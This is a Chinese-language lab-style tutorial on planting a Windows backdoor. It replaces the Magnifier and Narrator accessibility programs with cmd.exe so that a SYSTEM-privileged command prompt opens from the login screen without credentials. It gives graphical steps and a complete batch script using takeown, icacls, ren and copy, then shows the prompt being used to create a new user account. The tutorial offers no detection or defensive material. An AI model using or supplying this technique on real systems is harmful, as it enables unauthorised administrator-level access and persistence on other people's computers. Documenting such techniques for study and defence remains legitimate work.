利用开机账户登录“轻松访问”创建Windows后门

利用开机账户登录“轻松访问”创建Windows后门

实验原理:

利用登录账户界面的“轻松访问”中的“放大镜”,把它替换为cmd.exe程序,实现在不登录的情况下打开命令提示符,并进行一些操作(打开的cmd的权限为系统管理员权限)。

实验步骤:

一、图形化操作

1.找到Magnify.exe(放大镜),尝试重命名,提示没有权限,是因为该程序的所有者不是当前用户

　　

2.把当前程序的所有者修改为当前用户

　　

3.修改完程序的所有者之后,就可以对该程序进行操作了,这里先备份一下Magnify.exe,方便以后进行恢复,然后复制一份cmd.exe程序,并把复制的cmd程序修改为Magnify.exe,这样以后通过“轻松访问“,打开放大镜(实际上就是打开cmd.exe程序了)

　　

4.点击“轻松访问“,打开”放大镜“点击左下角标识，我们可以看到如下界面呈现的页面，因为我们的后门是对放大镜程序做了更改，将放大镜直接更改为以管理员运行的cmd命令操作行，所以，我们点击放大镜，就可以直接进入cmd。

　　

5.可以看到cmd.exe程序运行了,这样就可以进行一些操作了,这里以创建用户为例

　　

二、用脚本运行:

1.脚本内容如下:  #不懂命令的语法可以自己输入命令查看帮助文档

打开记事本，输入如下的命令：

切换目录到c:\windows\system32；

cd c:\windows\system32

更改文件名为magnify.exe的所有者为当前用户；

takeown /f Narrator.exe

将当前用户所在的组（管理员组）赋予完全访问权限；

icacls Narrator.exe /grant administrators:F

将可执行文件magnify.exe更名为magnify_back.exe；

ren Narrator.exe Narrator_back.exe

将cmd.exe复制并更名为magnify.exe；

copy cmd.exe Narrator.exe

　　

2.懂命令的语法可以自己输入命令查看帮助文档

　　

　　

3.把文件保存为back.bat,并双击运行,接下开屏幕会闪烁一下,后门已经搞好了

4.重启电脑使刚才运行的脚本生效,点击“轻松访问“,点击”讲述人“

　　

5.可以看到运行了cmd程序,因为我们的后门是对讲述人程序做了更改，将讲述人直接更改为以管理员运行的cmd命令操作行，所以，我们点击讲述人，就可以直接进入cmd。系统在没有输入用户名和密码的情况下，弹出了cmd命令行界面，而且是system权限

　　

6.重启系统,用刚才创建的用户名密码登录(这里我加入域了,所以本地登录需要在用户名前面加上本地计算机名)